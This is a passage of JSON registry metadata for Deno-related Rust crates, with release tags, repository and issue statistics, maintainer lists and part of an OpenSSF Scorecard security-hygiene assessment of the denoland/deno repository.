v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T15:40:53.686Z","dependent_packages_count":0,"downloads":4432,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.7596418936946,"dependent_repos_count":24.440162452198145,"dependent_packages_count":32.41514244211899,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.87164892933725},"purl":"pkg:cargo/lib_node_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/lib_node_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/lib_node_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/lib_node_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/codemeta","maintainers":[{"uuid":"300816","login":"carloslfu","name":"Carlos Galarza","email":null,"url":"https://github.com/carloslfu","packages_count":8,"html_url":"https://crates.io/users/carloslfu","role":null,"created_at":"2024-11-20T17:46:56.757Z","updated_at":"2024-11-20T17:46:56.757Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/carloslfu/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11105132,"name":"deno_npm_cache","ecosystem":"cargo","description":"Helpers for downloading and caching npm dependencies for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":77,"first_release_published_at":"2024-12-03T00:17:02.431Z","latest_release_published_at":"2026-08-06T11:48:28.841Z","latest_release_number":"0.76.0","last_synced_at":"2026-08-29T21:57:08.142Z","created_at":"2024-12-03T00:32:39.543Z","updated_at":"2026-08-29T21:57:08.142Z","registry_url":"https://crates.io/crates/deno_npm_cache/","install_command":"cargo install deno_npm_cache","documentation_url":"https://docs.rs/deno_npm_cache/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction 